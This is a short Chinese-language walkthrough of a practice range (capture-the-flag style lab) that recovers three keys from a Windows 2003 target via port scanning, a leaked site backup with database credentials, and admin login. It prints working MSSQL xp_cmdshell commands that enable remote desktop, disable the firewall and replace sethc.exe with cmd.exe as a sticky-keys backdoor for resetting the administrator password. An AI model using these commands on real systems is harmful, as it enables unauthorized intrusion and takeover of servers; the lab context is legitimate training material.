綜合題目前只搞到一個靶場,一起來看看吧。。。
打開頁面是這個樣子的,
第一步:先來掃一下端口,爆破一下目錄。
看來80端口是沒有什么可搞得,再來看看8080端口。
8080端口是一個后台,還掃出了備份文件。
第二步:有了這個網站備份文件,當然要翻翻看,有沒有什么賬號密碼什么的。
第三步:打開navicat連接,得來全不費工夫。
第四步:得到第一個key,接着再翻翻其他庫,找找后台賬號密碼。
很順利就找到了,不過需要解密
第五步,有了后台賬號密碼,登陸看看,沒想到,這個key就在頁面里。
第六步:登錄進來以后,找找有沒有上傳點什么的。折騰了半天找了一堆無用的漏洞,上傳點也上傳不上去。這才想起來因為目標服務器系統是Windows 2003,所以可以利用數據庫操作命令關閉系統防火牆,寫入cmd彈窗木馬。
這里把代碼貼給大家:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
EXEC master.dbo.xp_cmdshell 'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
EXEC master.dbo.xp_cmdshell 'netsh firewall set opmode disable'
EXEC master.dbo.xp_cmdshell 'cd C:\WINDOWS\system'
EXEC master.dbo.xp_cmdshell 'copy cmd.exe c:\WINDOWS\system\sethc.exe' (這一操作不明白的建議看下結尾推薦的博文)
EXEC master.dbo.xp_cmdshell 'netstat -an'
想着建個用戶就可以登錄3389遠程桌面了,但是誰想拒絕訪問。
參考網上的解決辦法 :
按5下shift 激活粘滯鍵,然后輸入explorer.exe 刷新桌面,免密碼選擇計算機管理,修改administrator 密碼
或者按5下后,輸入計算機管理的單詞:compmgmt.msc 調出計算機管理,改密碼
進入桌面拿到key3
就這樣修改密碼,遠程連接,就拿下最后一個key了。
后來查了下這個功能,才大致了解了。詳細的參考下面這個博客。
https://www.cnblogs.com/hai-long/p/12038251.html